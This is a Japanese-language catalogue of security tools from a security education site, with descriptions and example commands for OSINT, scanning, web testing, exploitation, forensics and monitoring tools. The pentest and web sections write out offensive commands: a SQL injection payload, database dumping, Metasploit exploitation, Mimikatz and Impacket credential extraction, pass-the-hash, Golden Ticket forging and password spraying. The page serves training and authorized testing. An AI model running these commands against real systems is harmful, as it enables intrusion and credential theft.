Tools & Resources

ツール・リソース

セキュリティプロフェッショナルが使用するカテゴリ別ツール一覧。カードをクリックすると使用方法と公式サイトリンクが表示されます。

Mini Tools

ブラウザで使えるミニツール

サーバー送信なし・ブラウザ完結で動く CyberLens 製の補助ツールです。入力データは外部に送信されません。

Personal Security パスワード強度チェッカー

zxcvbn-ts によるパターン解析で推定クラック時間と弱点を診断。パスキー誘導付き。

使ってみる → Developer JWT デコーダ

JSON Web Token の Header / Payload を整形表示。exp / iat の時刻クレームを可読化。

使ってみる → Vulnerability CVSS v3.1 計算機

脆弱性の重大度を日本語UIで算出。共有用ベクター文字列も生成、FIRST 公式へ直接ジャンプ可能。

使ってみる →

OSINT・情報収集

6 ツール

Maltego

有料

グラフィカルなリンク分析ツール。人物・組織・インフラの関係性を可視化。

使用方法を見る

theHarvester

無料

ドメインに関連するメールアドレス・サブドメイン・IPを収集するCLIツール。

使用方法を見る

使用方法

対象ドメインに対してGoogle・Bing・Hunter.io等の複数ソースからメールアドレス・サブドメイン・IP・バーチャルホストを一括収集します。Kali Linuxにプリインストール済み。収集結果はHTML/XMLで出力可能です。

コマンド例

# 基本的な使用方法（Google + Bing からドメイン情報を収集）
theHarvester -d example.com -b google,bing -l 200

# LinkedIn からメールアドレスを収集
theHarvester -d example.com -b linkedin -l 100

# 全ソースを使用してHTML出力
theHarvester -d example.com -b all -f output.html

公式サイトへ

Shodan

有料

インターネット接続デバイスを検索できるサーチエンジン。IoT・脆弱なシステムの発見に使用。

使用方法を見る

使用方法

Webインターフェースまたは公式CLIツール（shodan）で検索クエリを実行します。フィルター演算子を組み合わせて、特定の組織・国・ポートで絞り込み検索が可能。APIキーを取得すればCLIやPythonライブラリからも利用できます。

コマンド例

# CLIツールのインストールと初期設定
pip install shodan
shodan init YOUR_API_KEY

# 特定ポートが開いているIPを検索
shodan search "port:22 country:JP" --fields ip_str,port,org

# 特定組織のデバイスを検索
shodan search "org:\"Example Corp\"" --limit 100

公式サイトへ

Recon-ng

無料

モジュール式OSINT偵察フレームワーク。Metasploitライクなインターフェース。

使用方法を見る

使用方法

インタラクティブコンソールで操作します。Workspaceを作成し、moduleをロードして対象ドメインを設定→run で実行。収集データはWorkspaceのデータベースに蓄積され、report/htmlモジュールでレポート出力できます。

コマンド例

# 起動とワークスペース作成
recon-ng
workspaces create target_company

# ドメインからホストを探索するモジュールの使用
modules load recon/domains-hosts/bing_domain_web
options set SOURCE example.com
run

# 収集データをレポート出力
modules load reporting/html
options set FILENAME /tmp/report.html
run

公式サイトへ

SpiderFoot

無料

ドメイン・IP・メール等の自動OSINT収集ツール。200以上のデータソースを統合。

使用方法を見る

使用方法

WebUIをローカルで起動し、スキャン対象（ドメイン・IP・メール等）を入力するだけで200以上のデータソースから自動的に情報を収集します。収集結果はグラフ・テーブルで可視化され、CSVやJSONでエクスポート可能です。

コマンド例

# WebUI を起動（デフォルト: http://127.0.0.1:5001）
python3 ./sf.py -l 127.0.0.1:5001

# CLIモードでスキャン実行
python3 ./sf.py -s example.com -t INTERNET_NAME -m sfp_dnsresolve,sfp_whois

# Docker での起動
docker run -p 5001:5001 spiderfoot/spiderfoot

公式サイトへ

Censys

有料

インターネット上のデバイス・証明書・ドメインを検索できる研究者向けプラットフォーム。

使用方法を見る

使用方法

WebインターフェースでIPアドレス・ドメイン・証明書を検索できます。Censysクエリ言語（CQL）を使って詳細なフィルタリングが可能。Python APIライブラリを使うとスクリプトから自動検索・収集もできます。

コマンド例

# Python ライブラリのインストール
pip install censys

# 証明書検索（特定ドメインを含む証明書を列挙）
python3 -c "from censys.search import CensysCerts; c = CensysCerts(); print(list(c.search('parsed.names: example.com')))"

# ホスト検索（APIキー設定後）
censys search 'services.port=443 and services.tls.certificates.leaf_data.subject.organization="Example"' --index-type hosts

公式サイトへ

ネットワーク解析

6 ツール

Nmap

無料

ネットワーク探索とセキュリティ監査の標準ツール。ポートスキャン・OS検出・NSEスクリプト対応。

使用方法を見る

使用方法

ターゲットIPまたはドメインを指定してポートスキャンを実行します。-sV でサービスバージョン、-O でOS情報を取得でき、-sC でデフォルトのNSEスクリプトを実行して脆弱性の初期調査も可能です。スキャン結果は -oA で複数形式で保存できます。

コマンド例

# ホスト探索（生存確認のみ）
nmap -sn 192.168.1.0/24

# サービス・OS検出 + デフォルトスクリプト
sudo nmap -sV -O -sC 192.168.1.100

# 全ポートスキャン（高速）
sudo nmap -sS -p- --min-rate 5000 192.168.1.100 -oA scan_result

# NSEスクリプトで脆弱性確認
nmap --script=vuln 192.168.1.100 -p 80,443

公式サイトへ

Wireshark

無料

ネットワークパケットをリアルタイムキャプチャ・解析するGUIツール。セキュリティ解析の定番。

使用方法を見る

使用方法

GUIを起動してキャプチャするNICを選択し、パケットのリアルタイム収集を開始します。表示フィルター（Display Filter）でプロトコルやIPでの絞り込みが可能です。「Follow TCP Stream」でHTTP通信の内容を読み取れます。

コマンド例

# CLI版（tshark）でキャプチャをファイルに保存
sudo tshark -i eth0 -w capture.pcap

# HTTPトラフィックのみ表示（表示フィルター例）
# Wireshark のフィルターバーに入力:
http.request.method == "POST"

# tshark で特定フィールドを抽出
tshark -r capture.pcap -T fields -e http.host -e http.request.uri

# DNS クエリのみ抽出
tshark -r capture.pcap -Y "dns.qr == 0" -T fields -e dns.qry.name

公式サイトへ

tcpdump

無料

コマンドラインのパケットキャプチャツール。自動化・スクリプトとの連携に適している。

使用方法を見る

使用方法

指定したNICのトラフィックをキャプチャしてターミナルに表示またはpcapファイルに保存します。BPF（Berkeley Packet Filter）構文でフィルタリングが可能。サーバー上でのリモートキャプチャやcronによる定期キャプチャに適しています。

コマンド例

# 特定インターフェースをキャプチャしてpcap保存
sudo tcpdump -i eth0 -w /tmp/capture.pcap

# 特定ホスト・ポートのトラフィックのみ
sudo tcpdump -i eth0 host 192.168.1.100 and port 80 -A

# HTTPの平文ボディを表示（-l でバッファリング無効）
sudo tcpdump -i eth0 -A -s0 "tcp port 80" | grep -E "GET|POST|Host:|User-Agent:"

# DNSクエリのみキャプチャ
sudo tcpdump -i eth0 udp port 53 -l -nn

公式サイトへ

Zeek

無料

高性能なネットワーク通信解析フレームワーク。SOC・NSMでの大規模ログ生成に使用。

使用方法を見る

使用方法

ライブトラフィックまたはpcapファイルを解析し、接続・DNS・HTTP・SSL等のプロトコルログをTSV形式で自動生成します。Zeekスクリプト（.zeek）で独自の検知ロジックを実装でき、SIEMへのログ転送にも適しています。

コマンド例

# pcapファイルをオフライン解析
zeek -r capture.pcap

# ライブキャプチャを開始
sudo zeek -i eth0 /usr/share/zeek/scripts/site/local.zeek

# 生成されたHTTPログの確認
cat http.log | zeek-cut ts id.orig_h id.resp_h uri status_code

# 特定の接続をDNSログから検索
cat dns.log | zeek-cut ts query answers | grep "malware"

公式サイトへ

Suricata

無料

高性能なIDS/IPS・ネットワークセキュリティ監視エンジン。YAML設定でルールを柔軟に管理。

使用方法を見る

使用方法

ルールファイル（.rules）を設定してIDSモードまたはIPSモードで動作させます。Suricata Emerging Threats（ET）ルールセットを利用して既知の攻撃を自動検知でき、EVE JSONログ形式でELKスタックやSplunkへ転送可能です。

コマンド例

# IDSモードでライブ監視（アラートをコンソールに表示）
sudo suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata/

# pcapファイルをオフライン解析
sudo suricata -c /etc/suricata/suricata.yaml -r capture.pcap -l /tmp/logs/

# ルールセットの更新
sudo suricata-update

# アラートログの確認
cat /var/log/suricata/fast.log | grep "ALERT"

公式サイトへ

Masscan

無料

超高速インターネットスキャナー。数分で全IPv4アドレスのポートをスキャン可能。

使用方法を見る

使用方法

Nmap互換の構文で超高速ポートスキャンを実行します。--rate で送信レートを制御でき、大規模なネットワークの初期探索に適しています。発見したポートの詳細調査にはNmapと組み合わせるのが一般的です。

コマンド例

# サブネット全体の80・443ポートをスキャン
sudo masscan -p80,443 192.168.1.0/24 --rate=10000

# 全ポートを高速スキャン
sudo masscan -p1-65535 192.168.1.0/24 --rate=50000 -oG output.txt

# 除外IPを設定してスキャン
sudo masscan -p22,80,443 10.0.0.0/8 --rate=5000 --excludefile=exclude.txt

公式サイトへ

Webセキュリティ

6 ツール

Burp Suite

有料

Webアプリセキュリティテストの統合プラットフォーム。Proxy・Scanner・Intruder等の機能を搭載。

使用方法を見る

使用方法

ブラウザのプロキシを127.0.0.1:8080に設定し、Burp Suite Community Editionを起動します。Proxy→Interceptでリクエストを傍受・改ざんし、Repeaterで繰り返しテスト、Intruderでパラメータのブルートフォースが可能。CA証明書をインポートすることでHTTPS通信も傍受できます。

コマンド例

# CLI 起動（Kali Linux）
burpsuite &

# Burp の CA 証明書をエクスポート（HTTPS傍受に必要）
# ブラウザで http://burpsuite にアクセス → CA 証明書をダウンロード
# Firefox: 設定 → 証明書を表示 → インポート

# SQLi テスト例（Repeater でパラメータ変更）
# id=1 → id=1' OR '1'='1  → 全レコード取得を確認

公式サイトへ

OWASP ZAP

無料

オープンソースのWebアプリ脆弱性スキャナー。自動スキャンとインターセプトプロキシを搭載。

使用方法を見る

使用方法

GUIモードでURLを入力して自動スパイダー＆スキャンを実行するか、CLIモードでCI/CDパイプラインに組み込めます。能動的スキャンでSQLi・XSS・CSRF等の脆弱性を自動検出し、結果をHTML/JSONレポートで出力できます。

コマンド例

# CLI での自動スキャン（Docker 経由）
docker run -t ghcr.io/zaproxy/zaproxy:stable zap-baseline.py \
  -t https://target.example.com -r zap_report.html

# API スキャン（OpenAPI 定義ファイルを使用）
docker run -t ghcr.io/zaproxy/zaproxy:stable zap-api-scan.py \
  -t https://target.example.com/openapi.json -f openapi -r api_report.html

# ZAP をデーモンモードで起動（APIアクセス用）
zap.sh -daemon -port 8090 -host 127.0.0.1

公式サイトへ

SQLmap

無料

SQLインジェクション脆弱性の検出と悪用を自動化するツール。

使用方法を見る

使用方法

脆弱なパラメータを含むURLを指定するだけでSQLi検出から情報抽出まで自動化します。Burp Suiteのリクエストファイルをそのまま入力することも可能。--level/--risk でスキャン強度を調整できます。

コマンド例

# URLパラメータのSQLi検査
sqlmap -u "http://target/page.php?id=1" --dbs

# 特定DBのテーブル一覧を取得
sqlmap -u "http://target/page.php?id=1" -D dbname --tables

# テーブルのデータをダンプ
sqlmap -u "http://target/page.php?id=1" -D dbname -T users --dump

# Burp Suiteのリクエストファイルを使用
sqlmap -r request.txt --level=3 --risk=2

公式サイトへ

Nikto

無料

WebサーバーのCGI・設定ミス・既知の脆弱性をスキャンするオープンソースツール。

使用方法を見る

使用方法

ターゲットのWebサーバーに対してHTTPリクエストを送信し、6,700以上のチェック項目でサーバーヘッダー・CGI・設定ミス・古いソフトウェアバージョンを検出します。-ssl オプションでHTTPS対応サイトもスキャン可能です。

コマンド例

# 基本スキャン
nikto -h http://target.example.com

# HTTPS サイトのスキャン
nikto -h https://target.example.com -ssl

# 特定ポートを指定してスキャン・HTML出力
nikto -h target.example.com -port 8080 -Format html -output nikto_report.html

# 特定チューニングでスキャン（1=ファイル・5=情報開示のみ）
nikto -h http://target.example.com -Tuning 1,5

公式サイトへ

ffuf

無料

超高速WebファジングツールGo製。ディレクトリ探索・パラメータファジングに対応。

使用方法を見る

使用方法

URLの任意の位置に "FUZZ" キーワードを埋め込み、ワードリストを指定して高速ファジングを実行します。ディレクトリ探索・サブドメイン探索・パラメータファジング・POST bodyファジングに対応。フィルター（-fc/-fs/-fl）でノイズを除去できます。

コマンド例

# ディレクトリ探索（404を除外）
ffuf -u http://target.example.com/FUZZ -w /usr/share/wordlists/common.txt -fc 404

# サブドメイン探索
ffuf -u http://FUZZ.example.com -w subdomains.txt -H "Host: FUZZ.example.com"

# POSTパラメータのファジング
ffuf -u http://target.example.com/login -X POST -d "user=admin&pass=FUZZ" \
  -w passwords.txt -fc 302

# 拡張子を指定してファイル探索
ffuf -u http://target.example.com/FUZZ -w wordlist.txt -e .php,.html,.txt

公式サイトへ

Gobuster

無料

URI・DNSサブドメイン・Webコンテンツのディレクトリブルートフォースツール。

使用方法を見る

使用方法

dir・dns・vhostモードで用途に応じたブルートフォースを実行します。-t でスレッド数を調整して高速化できます。ffufより設定がシンプルで、初心者がディレクトリ探索を始めるのに適したツールです。

コマンド例

# ディレクトリ探索
gobuster dir -u http://target.example.com -w /usr/share/wordlists/dirb/common.txt

# DNSサブドメイン探索
gobuster dns -d example.com -w subdomains.txt -t 50

# 特定拡張子のファイルを探索
gobuster dir -u http://target.example.com -w wordlist.txt -x php,html,txt -t 40

# 認証が必要なサイトへのアクセス
gobuster dir -u http://target.example.com -w wordlist.txt -U username -P password

公式サイトへ

エクスプロイト・ペンテスト

6 ツール

Metasploit Framework

無料

ペネトレーションテスト用の世界標準フレームワーク。多数のエクスプロイトモジュールを搭載。

使用方法を見る

使用方法

msfconsole を起動し、search コマンドで脆弱性を検索してモジュールをロードします。RHOSTS（ターゲット）・LHOST（自分のIP）等のオプションを設定してrun/exploit を実行。Meterpreterセッションを取得後は高度な後処理が可能です。必ず許可を得た環境でのみ使用してください。

コマンド例

# msfconsole の起動
msfconsole

# エクスプロイトの検索と使用
search vsftpd 2.3.4
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.101
run

# Meterpreter セッション取得後の操作
sysinfo
getuid
hashdump

公式サイトへ

Kali Linux

無料

セキュリティ・ペネトレーションテスト特化のLinuxディストリビューション。600以上のツールを収録。

使用方法を見る

使用方法

VirtualBoxやVMware用のOVAイメージをダウンロードしてインポートするか、公式ISOからブータブルUSBを作成します。デフォルトユーザー: kali / パスワード: kali。ターミナル・Burp Suite・Metasploit等が最初からインストール済みです。

コマンド例

# VM イメージのダウンロード後、起動して最新化
sudo apt update && sudo apt full-upgrade -y

# ツールのカテゴリ別確認
kali-menu

# 追加ツールのインストール（例: impacket）
sudo apt install python3-impacket -y

# Kali の Python 環境確認
python3 --version && pip3 list | grep -i "metasploit\|impacket"

公式サイトへ

Cobalt Strike

有料

高度な脅威エミュレーションプラットフォーム。レッドチーム演習で広く使用（商用）。

使用方法を見る

使用方法

Team ServerをLinuxに立ち上げ、Windows版クライアントから接続して使用します。リスナーを作成してペイロード（Beacon）を生成し、標的に実行させてセッションを確立。Aggressor Scriptで自動化や拡張が可能です。ライセンス購入・正式な許可が必要です。

コマンド例

# Team Server の起動（Linux）
./teamserver [IP] [パスワード] [malleable-profile]

# クライアントから接続後の操作（Cobalt Strike コンソール）
# リスナーを作成: Listeners → Add → HTTP/HTTPS/DNS
# ペイロード生成: Attacks → Packages → Windows Executable

# Beacon コマンド例（セッション確立後）
sleep 30  # ビーコン間隔を30秒に設定
shell whoami  # システムコマンド実行
ps  # プロセス一覧の取得

公式サイトへ

Impacket

無料

Windowsネットワークプロトコル操作用Pythonライブラリ。SMB・Kerberos・LDAP等に対応。

使用方法を見る

使用方法

PythonベースのCLIスクリプト群として使用します。secretsdump.pyでSAMデータベースやDCからクレデンシャルを抽出、wmiexec.pyやpsexec.pyでリモートコマンド実行、GetUserSPNs.pyでKerberoastingが可能です。

コマンド例

# SAMデータベースからハッシュを抽出
python3 secretsdump.py DOMAIN/user:[email protected]

# WMI経由でリモートコマンド実行
python3 wmiexec.py DOMAIN/user:[email protected] "whoami"

# Kerberoasting（SPNを持つアカウントのチケット取得）
python3 GetUserSPNs.py DOMAIN/user:pass -dc-ip 192.168.1.1 -request

# Pass-the-Hash でリモート実行
python3 psexec.py -hashes :NTLMHASH DOMAIN/[email protected]

公式サイトへ

Mimikatz

無料

Windowsの認証情報（パスワード・ハッシュ・チケット）を抽出するツール（教育・検証用途）。

使用方法を見る

使用方法

管理者権限で実行し、LSASSプロセスからメモリ上の認証情報を抽出します。ペネトレーションテストのポスト・エクスプロイテーション段階で、ラテラルムーブメントのためのクレデンシャル収集に使用されます。教育・検証目的にのみ使用してください。

コマンド例

# privilege を取得して LSASS から認証情報を抽出
privilege::debug
sekurlsa::logonpasswords

# SAM からローカルハッシュを抽出
lsadump::sam

# Golden Ticket の作成
kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi

# Pass-the-Hash
sekurlsa::pth /user:Admin /domain:DOMAIN /ntlm:HASH /run:cmd.exe

公式サイトへ

CrackMapExec

無料

Windowsインフラの評価に特化した多目的ペネトレーションテストツール。

使用方法を見る

使用方法

SMB・SSH・LDAP・WinRM等のプロトコルを通じてWindowsネットワークの評価を行います。クレデンシャルのスプレーや接続確認、SAMダンプ、シェル実行など多彩な機能を持ちます。NetExecリポジトリが後継プロジェクトとして活発に開発中です。

コマンド例

# 認証情報でSMB接続確認（サブネット全体）
cme smb 192.168.1.0/24 -u user -p password

# パスワードスプレー攻撃
cme smb 192.168.1.0/24 -u users.txt -p "Summer2024!"

# SAM データベースのダンプ
cme smb 192.168.1.100 -u Admin -p pass --sam

# リモートコマンド実行
cme smb 192.168.1.100 -u Admin -p pass -x "whoami /all"

公式サイトへ

フォレンジクス・マルウェア解析

6 ツール

Autopsy

無料

デジタルフォレンジクスプラットフォーム。ディスクイメージ解析・タイムライン生成・キーワード検索対応。

使用方法を見る

使用方法

GUIで新規ケースを作成し、ディスクイメージ（E01・dd等）やUSBデバイスをデータソースとして追加します。自動解析モジュールが削除ファイル復元・ブラウザ履歴・レジストリ解析を自動実行し、タイムラインビューで事象の経緯を把握できます。

コマンド例

# Autopsy は主に GUI で操作します
# Linux では以下のコマンドで起動
sudo /usr/share/autopsy/autopsy

# CLI ツール（The Sleuth Kit）でファイルシステムを解析
mmls disk.dd              # パーティションテーブルの表示
fls -r -o 2048 disk.dd    # ファイル一覧の再帰表示
icat disk.dd 512 > recovered_file  # inode番号でファイル抽出

# 削除ファイルの一覧表示
fls -rd -o 2048 disk.dd | grep -v "r/r"

公式サイトへ

Volatility

無料

メモリフォレンジクスの標準フレームワーク。Windowsプロセス・ネットワーク接続・マルウェアの解析が可能。

使用方法を見る

使用方法

メモリダンプファイル（.dmp / .mem等）に対してプラグインを実行します。まずimage info でOSプロファイルを特定し、pslist・cmdline・netscan・malfind等のプラグインで不審なプロセス・接続・注入コードを探索します。

コマンド例

# Volatility 3 でプロセス一覧を表示
python3 vol.py -f memory.dmp windows.pslist

# ネットワーク接続の確認
python3 vol.py -f memory.dmp windows.netscan

# コマンドライン引数の確認（マルウェアの実行引数を解析）
python3 vol.py -f memory.dmp windows.cmdline

# プロセスインジェクションの検出
python3 vol.py -f memory.dmp windows.malfind

# 特定プロセスからファイルをダンプ
python3 vol.py -f memory.dmp windows.dumpfiles --pid 1234

公式サイトへ

Ghidra

無料

NSA開発のオープンソース逆アセンブラ。Windows/Linux/macOS実行ファイルの静的解析に対応。

使用方法を見る

使用方法

プロジェクトを作成してバイナリファイルをインポートし、Auto Analyzeを実行します。CodeBrowserでアセンブリとデコンパイル結果を同時表示でき、関数・変数に意味のある名前を付けながら解析を進めます。Pythonスクリプトで解析を自動化することも可能です。

コマンド例

# GUIの起動（JDK 17以上が必要）
./ghidraRun

# CLI でヘッドレス解析（バッチ処理向け）
./analyzeHeadless /path/to/project ProjectName \
  -import /path/to/malware.exe -postScript PrintTree.py

# Ghidra スクリプトでコメントを追加（Python API）
# currentProgram.getListing().getCodeUnitAt(addr).setComment(...)

公式サイトへ

IDA Pro

有料

業界標準のインタラクティブ逆アセンブラ。高度なマルウェア解析・エクスプロイト開発に使用（商用）。

使用方法を見る

使用方法

バイナリを開いて自動解析後、関数グラフ・クロスリファレンス・デコンパイラ（Hex-Rays）を使って解析します。IDAPython/IDCスクリプトで繰り返し処理を自動化でき、プラグイン（FLIRT・Lumina等）で解析精度を向上できます。IDA Free（無料版）は64bitバイナリのみ対応。

コマンド例

# GUIで起動してバイナリを開く
./ida64 malware.exe

# IDAPython スクリプトの実行例
# File → Script command または Alt+F7

# 関数の自動コメント生成（IDAPython）
for func in Functions():
    SetFunctionCmt(func, "Auto-labeled", False)

# Hex-Rays デコンパイラ（F5）でC言語相当のコードを表示

公式サイトへ

ANY.RUN

有料

インタラクティブなオンラインマルウェアサンドボックス。疑わしいファイルを安全に実行して動作解析。

使用方法を見る

使用方法

ブラウザ上でファイル（EXE・PDF・Officeドキュメント等）またはURLを指定して分析を開始します。リアルタイムにプロセスツリー・ネットワーク通信・レジストリ変更を観察でき、MITRE ATT&CKへのマッピングと脅威スコアが自動生成されます。無料プランでは公開分析のみ可能。

コマンド例

# API を使ってサンドボックスに提出
curl -X POST https://api.any.run/v1/analysis \
  -H "Authorization: API-Key YOUR_KEY" \
  -F "[email protected]" \
  -F "env_os=windows" \
  -F "env_bitness=64"

# 分析結果の取得
curl https://api.any.run/v1/analysis/{task-id} \
  -H "Authorization: API-Key YOUR_KEY"

公式サイトへ

Cuckoo Sandbox

無料

オープンソースの自動マルウェア解析システム。ローカル環境に構築してファイルの動的解析が可能。

使用方法を見る

使用方法

ホストOS（Ubuntu等）にCuckooをインストールし、VirtualBox上のWindowsゲストVMをサンドボックスとして設定します。サンプルを提出するとゲストVM上で自動実行され、API呼び出し・ネットワーク通信・ファイル変更をレポートとして出力します。

コマンド例

# マルウェアサンプルを提出
cuckoo submit /path/to/malware.exe

# URLを解析対象として提出
cuckoo submit --url http://malicious.example.com

# Cuckoo Web UI の起動
cuckoo web runserver 0.0.0.0:8080

# 完了したタスクのレポートを確認
ls ~/.cuckoo/storage/analyses/

公式サイトへ

セキュリティ監視・防御

6 ツール

Splunk

有料

大規模ログ収集・分析・可視化プラットフォーム。SOCでのSIEM用途に最も広く使用（商用）。

使用方法を見る

使用方法

Universal Forwarderでエンドポイントからログを収集し、Splunk Search & Reporting AppでSPL（Search Processing Language）クエリを実行します。ダッシュボード・アラート・相関ルールを作成してセキュリティ監視を自動化できます。無料版は日次500MBまで取り込み可能です。

コマンド例

# 基本的なSPL クエリ例（Splunk検索バーに入力）
index=main sourcetype=access_log status=404 | stats count by clientip | sort -count

# SSHブルートフォースの検出
index=linux_secure "Failed password" | rex "from (?P<src_ip>\d+\.\d+\.\d+\.\d+)" \
| stats count by src_ip | where count > 10

# タイムチャートでのトラフィック可視化
index=network | timechart span=5m count by action

公式サイトへ

Elastic SIEM

有料

Elasticsearch/Kibanaベースのオープンソース寄りSIEM。MITRE ATT&CKマッピング対応。

使用方法を見る

使用方法

Elastic AgentまたはFilebeatでログを収集しElasticsearchに保存。Kibana Security AppでTimeline（インシデント調査）・Detection Rules（MITRE ATT&CK準拠）・Alert管理が可能です。KQL（Kibana Query Language）またはEQLで高度な脅威検出クエリを記述できます。

コマンド例

# EQL で不審なPowerShellを検出
process where process.name == "powershell.exe" and \
  process.args : ("*-enc*", "*-EncodedCommand*", "*bypass*")

# KQL クエリ例（Kibana Discover に入力）
event.category: "process" and process.name: "cmd.exe" and user.name: "SYSTEM"

# Filebeat でNginxログを取り込む設定（filebeat.yml）
# filebeat.inputs:
#   - type: filestream
#     paths: ["/var/log/nginx/access.log"]

公式サイトへ

Wazuh

無料

オープンソースの統合セキュリティプラットフォーム。SIEM・FIM・脆弱性管理・EDRを統合。

使用方法を見る

使用方法

Wazuh Manager（サーバー）にWazuh Agentをエンドポイントにインストールして接続します。Kibana上のWazuh Dashboardでアラート・脆弱性・FIM（ファイル整合性監視）・コンプライアンス状況を一元管理できます。Docker Composeでの一括インストールが最も簡単です。

コマンド例

# Docker Compose で一括インストール（推奨）
git clone https://github.com/wazuh/wazuh-docker.git
cd wazuh-docker/single-node
docker compose up -d

# エージェントのインストール（Debian/Ubuntu）
curl -so wazuh-agent.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/...
sudo WAZUH_MANAGER="manager_ip" dpkg -i wazuh-agent.deb
sudo systemctl start wazuh-agent

# ルールファイルの確認
sudo cat /var/ossec/ruleset/rules/0015-ossec_rules.xml | head -50

公式サイトへ

Snort

無料

世界で最も広く展開されているオープンソースIDS/IPS。シグネチャベースの侵入検知。

使用方法を見る

使用方法

ルールファイル（.rules）を設定してIDSモードで監視を開始します。Snort 3では設定がLuaベースに刷新され、高性能かつ柔軟なルール記述が可能です。Snortルールセットの更新には Pulledpork や oinkmaster を使用します。

コマンド例

# IDSモードで起動（アラートをコンソールに出力）
sudo snort -c /etc/snort/snort.conf -i eth0 -A console

# パケットのログ取得モード（pcap形式で保存）
sudo snort -c /etc/snort/snort.conf -i eth0 -l /var/log/snort/

# pcapファイルをオフライン解析
sudo snort -c /etc/snort/snort.conf -r capture.pcap -A console

# カスタムルールのテスト
sudo snort -c /etc/snort/snort.conf -T  # 設定検証

公式サイトへ

OpenVAS

無料

オープンソースの脆弱性スキャナー。Greenbone Security Managerの無償版コンポーネント。

使用方法を見る

使用方法

Greenbone Community Edition（Docker版が最も簡単）をインストールし、Webインターフェース（localhost:9392）からスキャンタスクを作成・実行します。定期スキャンのスケジューリング・PDF/CSVレポート出力・CVSS スコアによる優先付けが可能です。

コマンド例

# Docker Compose でインストール（推奨）
docker compose -f docker-compose.yml -p greenbone-community-edition up -d

# 初回フィード更新（数分〜数時間かかる）
docker compose -p greenbone-community-edition \
  exec -u gvmd gvmd gvmd --rebuild --progress

# GVM CLIでスキャン実行
gvm-cli --gmp-username admin --gmp-password admin socket --xml \
  "<create_task><name>Quick Scan</name>...</create_task>"

公式サイトへ

Velociraptor

無料

エンドポイントフォレンジクス・インシデント対応・ハンティング用オープンソースツール。

使用方法を見る

使用方法

サーバー（Velociraptor Server）とクライアント（Velociraptor Agent）で構成。VQLクエリ言語でエンドポイントから情報を収集・分析します。Huntで複数エンドポイントへの同時クエリ実行、ArtifactでOSINT/フォレンジクス手順の標準化が可能です。

コマンド例

# ローカル実行モード（単一エンドポイント調査）
velociraptor gui

# VQL クエリの直接実行
velociraptor query "SELECT * FROM pslist()"

# 実行中プロセスのネットワーク接続を確認
velociraptor query "SELECT Pid, Name, Laddr, Raddr FROM netstat()"

# サーバーの起動（設定ファイル生成後）
velociraptor config generate -i
velociraptor --config server.config.yaml frontend -v

公式サイトへ